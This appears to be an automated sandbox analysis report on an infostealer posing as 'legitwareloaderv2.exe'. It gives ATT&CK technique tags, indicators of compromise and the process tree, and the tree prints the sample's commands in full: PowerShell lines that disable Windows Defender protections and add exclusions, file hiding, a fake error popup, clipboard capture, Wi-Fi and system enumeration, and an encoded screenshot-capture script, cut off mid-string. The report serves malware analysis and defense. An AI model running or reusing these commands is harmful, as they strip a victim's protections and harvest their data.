6b44de5307c7d1104fc357c9bdd525c5c1b80cdad61f5ac3cdfda2823dc79174

Analysis

max time kernel
141s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-11-2024 23:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

legitwareloaderv2.exe
Size

7.0MB
MD5

9d4bff181b897c180ce9cc2457da953c
SHA1

0ee29773e708ff6c371d67fecbee19800338cc05
SHA256

6b44de5307c7d1104fc357c9bdd525c5c1b80cdad61f5ac3cdfda2823dc79174
SHA512

f84a1fc26c3bd67dc473ab006ded771298b4d2f29ed9a01632df11d3ebc4a206673cc97c108e8324adc3ce0c642b1cc6a3e57a548c31d141eb3aee5747a1c189
SSDEEP

196608:cOV1ve0B6ylnlPzf+JiJCsmFMvln6hqg3:ne0BRlnlPSa7mmvlpg3

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4144	powershell.exe
4292	powershell.exe
5040	powershell.exe
1212	powershell.exe
2908	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	legitwareloaderv2.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3452	cmd.exe
3968	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2544	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe
468	legitwareloaderv2.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
28	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2424	tasklist.exe
4776	tasklist.exe
4384	tasklist.exe
4532	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
952	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023cac-21.dat	upx
behavioral1/memory/468-25-0x00007FFFAC940000-0x00007FFFACF2A000-memory.dmp	upx
behavioral1/files/0x0007000000023c9f-27.dat	upx
behavioral1/memory/468-30-0x00007FFFC0970000-0x00007FFFC0993000-memory.dmp	upx
behavioral1/files/0x0007000000023caa-29.dat	upx
behavioral1/memory/468-48-0x00007FFFC5190000-0x00007FFFC519F000-memory.dmp	upx
behavioral1/files/0x0007000000023ca6-47.dat	upx
behavioral1/files/0x0007000000023ca5-46.dat	upx
behavioral1/files/0x0007000000023ca4-45.dat	upx
behavioral1/files/0x0007000000023ca3-44.dat	upx
behavioral1/files/0x0007000000023ca2-43.dat	upx
behavioral1/files/0x0007000000023ca1-42.dat	upx
behavioral1/files/0x0007000000023ca0-41.dat	upx
behavioral1/files/0x0007000000023c9e-40.dat	upx
behavioral1/files/0x0007000000023cb1-39.dat	upx
behavioral1/files/0x0007000000023cb0-38.dat	upx
behavioral1/files/0x0007000000023caf-37.dat	upx
behavioral1/files/0x0007000000023cab-34.dat	upx
behavioral1/files/0x0007000000023ca9-33.dat	upx
behavioral1/memory/468-54-0x00007FFFBDD60000-0x00007FFFBDD8D000-memory.dmp	upx
behavioral1/memory/468-56-0x00007FFFC1C00000-0x00007FFFC1C19000-memory.dmp	upx
behavioral1/memory/468-58-0x00007FFFBCB70000-0x00007FFFBCB93000-memory.dmp	upx
behavioral1/memory/468-60-0x00007FFFBBB60000-0x00007FFFBBCCF000-memory.dmp	upx
behavioral1/memory/468-66-0x00007FFFBC2F0000-0x00007FFFBC31E000-memory.dmp	upx
behavioral1/memory/468-64-0x00007FFFC0930000-0x00007FFFC093D000-memory.dmp	upx
behavioral1/memory/468-76-0x00007FFFC0830000-0x00007FFFC0844000-memory.dmp	upx
behavioral1/memory/468-75-0x00007FFFC0970000-0x00007FFFC0993000-memory.dmp	upx
behavioral1/memory/468-73-0x00007FFFAC1B0000-0x00007FFFAC525000-memory.dmp	upx
behavioral1/memory/468-71-0x00007FFFBBF80000-0x00007FFFBC038000-memory.dmp	upx
behavioral1/memory/468-70-0x00007FFFAC940000-0x00007FFFACF2A000-memory.dmp	upx
behavioral1/memory/468-63-0x00007FFFC1B20000-0x00007FFFC1B39000-memory.dmp	upx
behavioral1/memory/468-78-0x00007FFFC0920000-0x00007FFFC092D000-memory.dmp	upx
behavioral1/memory/468-82-0x00007FFFBB4A0000-0x00007FFFBB5BC000-memory.dmp	upx
behavioral1/memory/468-94-0x00007FFFBCB70000-0x00007FFFBCB93000-memory.dmp	upx
behavioral1/memory/468-184-0x00007FFFBBB60000-0x00007FFFBBCCF000-memory.dmp	upx
behavioral1/memory/468-224-0x00007FFFC1B20000-0x00007FFFC1B39000-memory.dmp	upx
behavioral1/memory/468-282-0x00007FFFBC2F0000-0x00007FFFBC31E000-memory.dmp	upx
behavioral1/memory/468-297-0x00007FFFBBF80000-0x00007FFFBC038000-memory.dmp	upx
behavioral1/memory/468-309-0x00007FFFAC1B0000-0x00007FFFAC525000-memory.dmp	upx
behavioral1/memory/468-321-0x00007FFFC0830000-0x00007FFFC0844000-memory.dmp	upx
behavioral1/memory/468-323-0x00007FFFC0970000-0x00007FFFC0993000-memory.dmp	upx
behavioral1/memory/468-322-0x00007FFFAC940000-0x00007FFFACF2A000-memory.dmp	upx
behavioral1/memory/468-328-0x00007FFFBBB60000-0x00007FFFBBCCF000-memory.dmp	upx
behavioral1/memory/468-344-0x00007FFFC1B20000-0x00007FFFC1B39000-memory.dmp	upx
behavioral1/memory/468-345-0x00007FFFC0930000-0x00007FFFC093D000-memory.dmp	upx
behavioral1/memory/468-357-0x00007FFFBCB70000-0x00007FFFBCB93000-memory.dmp	upx
behavioral1/memory/468-356-0x00007FFFC1C00000-0x00007FFFC1C19000-memory.dmp	upx
behavioral1/memory/468-355-0x00007FFFBDD60000-0x00007FFFBDD8D000-memory.dmp	upx
behavioral1/memory/468-354-0x00007FFFC5190000-0x00007FFFC519F000-memory.dmp	upx
behavioral1/memory/468-353-0x00007FFFC0830000-0x00007FFFC0844000-memory.dmp	upx
behavioral1/memory/468-352-0x00007FFFAC1B0000-0x00007FFFAC525000-memory.dmp	upx
behavioral1/memory/468-351-0x00007FFFBB4A0000-0x00007FFFBB5BC000-memory.dmp	upx
behavioral1/memory/468-350-0x00007FFFC0920000-0x00007FFFC092D000-memory.dmp	upx
behavioral1/memory/468-347-0x00007FFFBBF80000-0x00007FFFBC038000-memory.dmp	upx
behavioral1/memory/468-346-0x00007FFFBC2F0000-0x00007FFFBC31E000-memory.dmp	upx
behavioral1/memory/468-343-0x00007FFFBBB60000-0x00007FFFBBCCF000-memory.dmp	upx
behavioral1/memory/468-338-0x00007FFFC0970000-0x00007FFFC0993000-memory.dmp	upx
behavioral1/memory/468-337-0x00007FFFAC940000-0x00007FFFACF2A000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4532	cmd.exe
4064	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
420	cmd.exe
2368	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
860	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
700	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4064	PING.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4144	powershell.exe
4144	powershell.exe
2908	powershell.exe
2908	powershell.exe
1212	powershell.exe
1212	powershell.exe
4144	powershell.exe
4144	powershell.exe
3968	powershell.exe
3968	powershell.exe
3968	powershell.exe
2908	powershell.exe
2908	powershell.exe
3100	powershell.exe
3100	powershell.exe
1212	powershell.exe
3100	powershell.exe
4292	powershell.exe
4292	powershell.exe
4292	powershell.exe
4404	powershell.exe
4404	powershell.exe
4404	powershell.exe
5040	powershell.exe
5040	powershell.exe
5040	powershell.exe
4556	powershell.exe
4556	powershell.exe
4556	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	2424	tasklist.exe
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	4776	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1108	WMIC.exe
Token: SeSecurityPrivilege	1108	WMIC.exe
Token: SeTakeOwnershipPrivilege	1108	WMIC.exe
Token: SeLoadDriverPrivilege	1108	WMIC.exe
Token: SeSystemProfilePrivilege	1108	WMIC.exe
Token: SeSystemtimePrivilege	1108	WMIC.exe
Token: SeProfSingleProcessPrivilege	1108	WMIC.exe
Token: SeIncBasePriorityPrivilege	1108	WMIC.exe
Token: SeCreatePagefilePrivilege	1108	WMIC.exe
Token: SeBackupPrivilege	1108	WMIC.exe
Token: SeRestorePrivilege	1108	WMIC.exe
Token: SeShutdownPrivilege	1108	WMIC.exe
Token: SeDebugPrivilege	1108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1108	WMIC.exe
Token: SeRemoteShutdownPrivilege	1108	WMIC.exe
Token: SeUndockPrivilege	1108	WMIC.exe
Token: SeManageVolumePrivilege	1108	WMIC.exe
Token: 33	1108	WMIC.exe
Token: 34	1108	WMIC.exe
Token: 35	1108	WMIC.exe
Token: 36	1108	WMIC.exe
Token: SeDebugPrivilege	4384	tasklist.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeIncreaseQuotaPrivilege	1108	WMIC.exe
Token: SeSecurityPrivilege	1108	WMIC.exe
Token: SeTakeOwnershipPrivilege	1108	WMIC.exe
Token: SeLoadDriverPrivilege	1108	WMIC.exe
Token: SeSystemProfilePrivilege	1108	WMIC.exe
Token: SeSystemtimePrivilege	1108	WMIC.exe
Token: SeProfSingleProcessPrivilege	1108	WMIC.exe
Token: SeIncBasePriorityPrivilege	1108	WMIC.exe
Token: SeCreatePagefilePrivilege	1108	WMIC.exe
Token: SeBackupPrivilege	1108	WMIC.exe
Token: SeRestorePrivilege	1108	WMIC.exe
Token: SeShutdownPrivilege	1108	WMIC.exe
Token: SeDebugPrivilege	1108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1108	WMIC.exe
Token: SeRemoteShutdownPrivilege	1108	WMIC.exe
Token: SeUndockPrivilege	1108	WMIC.exe
Token: SeManageVolumePrivilege	1108	WMIC.exe
Token: 33	1108	WMIC.exe
Token: 34	1108	WMIC.exe
Token: 35	1108	WMIC.exe
Token: 36	1108	WMIC.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	4532	tasklist.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeIncreaseQuotaPrivilege	3120	WMIC.exe
Token: SeSecurityPrivilege	3120	WMIC.exe
Token: SeTakeOwnershipPrivilege	3120	WMIC.exe
Token: SeLoadDriverPrivilege	3120	WMIC.exe
Token: SeSystemProfilePrivilege	3120	WMIC.exe
Token: SeSystemtimePrivilege	3120	WMIC.exe
Token: SeProfSingleProcessPrivilege	3120	WMIC.exe
Token: SeIncBasePriorityPrivilege	3120	WMIC.exe
Token: SeCreatePagefilePrivilege	3120	WMIC.exe
Token: SeBackupPrivilege	3120	WMIC.exe
Token: SeRestorePrivilege	3120	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3048 wrote to memory of 468	3048	legitwareloaderv2.exe	84
PID 3048 wrote to memory of 468	3048	legitwareloaderv2.exe	84
PID 468 wrote to memory of 3548	468	legitwareloaderv2.exe	88
PID 468 wrote to memory of 3548	468	legitwareloaderv2.exe	88
PID 468 wrote to memory of 4440	468	legitwareloaderv2.exe	89
PID 468 wrote to memory of 4440	468	legitwareloaderv2.exe	89
PID 468 wrote to memory of 3836	468	legitwareloaderv2.exe	90
PID 468 wrote to memory of 3836	468	legitwareloaderv2.exe	90
PID 468 wrote to memory of 952	468	legitwareloaderv2.exe	91
PID 468 wrote to memory of 952	468	legitwareloaderv2.exe	91
PID 468 wrote to memory of 4372	468	legitwareloaderv2.exe	92
PID 468 wrote to memory of 4372	468	legitwareloaderv2.exe	92
PID 468 wrote to memory of 436	468	legitwareloaderv2.exe	98
PID 468 wrote to memory of 436	468	legitwareloaderv2.exe	98
PID 468 wrote to memory of 1956	468	legitwareloaderv2.exe	99
PID 468 wrote to memory of 1956	468	legitwareloaderv2.exe	99
PID 4372 wrote to memory of 1212	4372	cmd.exe	102
PID 4372 wrote to memory of 1212	4372	cmd.exe	102
PID 4440 wrote to memory of 4144	4440	cmd.exe	103
PID 4440 wrote to memory of 4144	4440	cmd.exe	103
PID 3836 wrote to memory of 2784	3836	cmd.exe	104
PID 3836 wrote to memory of 2784	3836	cmd.exe	104
PID 952 wrote to memory of 4412	952	cmd.exe	105
PID 952 wrote to memory of 4412	952	cmd.exe	105
PID 468 wrote to memory of 3440	468	legitwareloaderv2.exe	106
PID 468 wrote to memory of 3440	468	legitwareloaderv2.exe	106
PID 468 wrote to memory of 3452	468	legitwareloaderv2.exe	107
PID 468 wrote to memory of 3452	468	legitwareloaderv2.exe	107
PID 1956 wrote to memory of 2424	1956	cmd.exe	109
PID 1956 wrote to memory of 2424	1956	cmd.exe	109
PID 3548 wrote to memory of 2908	3548	cmd.exe	111
PID 3548 wrote to memory of 2908	3548	cmd.exe	111
PID 468 wrote to memory of 4844	468	legitwareloaderv2.exe	112
PID 468 wrote to memory of 4844	468	legitwareloaderv2.exe	112
PID 436 wrote to memory of 4776	436	cmd.exe	114
PID 436 wrote to memory of 4776	436	cmd.exe	114
PID 468 wrote to memory of 3068	468	legitwareloaderv2.exe	115
PID 468 wrote to memory of 3068	468	legitwareloaderv2.exe	115
PID 468 wrote to memory of 420	468	legitwareloaderv2.exe	117
PID 468 wrote to memory of 420	468	legitwareloaderv2.exe	117
PID 468 wrote to memory of 5104	468	legitwareloaderv2.exe	119
PID 468 wrote to memory of 5104	468	legitwareloaderv2.exe	119
PID 468 wrote to memory of 3472	468	legitwareloaderv2.exe	120
PID 468 wrote to memory of 3472	468	legitwareloaderv2.exe	120
PID 468 wrote to memory of 4688	468	legitwareloaderv2.exe	122
PID 468 wrote to memory of 4688	468	legitwareloaderv2.exe	122
PID 3440 wrote to memory of 1108	3440	cmd.exe	125
PID 3440 wrote to memory of 1108	3440	cmd.exe	125
PID 4844 wrote to memory of 4384	4844	cmd.exe	126
PID 4844 wrote to memory of 4384	4844	cmd.exe	126
PID 3452 wrote to memory of 3968	3452	cmd.exe	127
PID 3452 wrote to memory of 3968	3452	cmd.exe	127
PID 420 wrote to memory of 2368	420	cmd.exe	129
PID 420 wrote to memory of 2368	420	cmd.exe	129
PID 3068 wrote to memory of 4132	3068	cmd.exe	140
PID 3068 wrote to memory of 4132	3068	cmd.exe	140
PID 4688 wrote to memory of 3100	4688	cmd.exe	131
PID 4688 wrote to memory of 3100	4688	cmd.exe	131
PID 3472 wrote to memory of 3012	3472	cmd.exe	132
PID 3472 wrote to memory of 3012	3472	cmd.exe	132
PID 5104 wrote to memory of 700	5104	cmd.exe	133
PID 5104 wrote to memory of 700	5104	cmd.exe	133
PID 468 wrote to memory of 2320	468	legitwareloaderv2.exe	163
PID 468 wrote to memory of 2320	468	legitwareloaderv2.exe	163

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4412	attrib.exe
2640	attrib.exe
4704	attrib.exe

C:\Users\Admin\AppData\Local\Temp\legitwareloaderv2.exe
"C:\Users\Admin\AppData\Local\Temp\legitwareloaderv2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3048
- C:\Users\Admin\AppData\Local\Temp\legitwareloaderv2.exe
  "C:\Users\Admin\AppData\Local\Temp\legitwareloaderv2.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\legitwareloaderv2.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\legitwareloaderv2.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Code - 10X9 ', 0, 'Fatal Loader Error ', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3836
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Code - 10X9 ', 0, 'Fatal Loader Error ', 0+16);close()"
      4⤵
      PID:2784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\legitwareloaderv2.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:952
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\legitwareloaderv2.exe"
      4⤵
      Views/modifies file attributes
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1956
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3440
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4844
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3068
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:420
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5104
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3472
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgA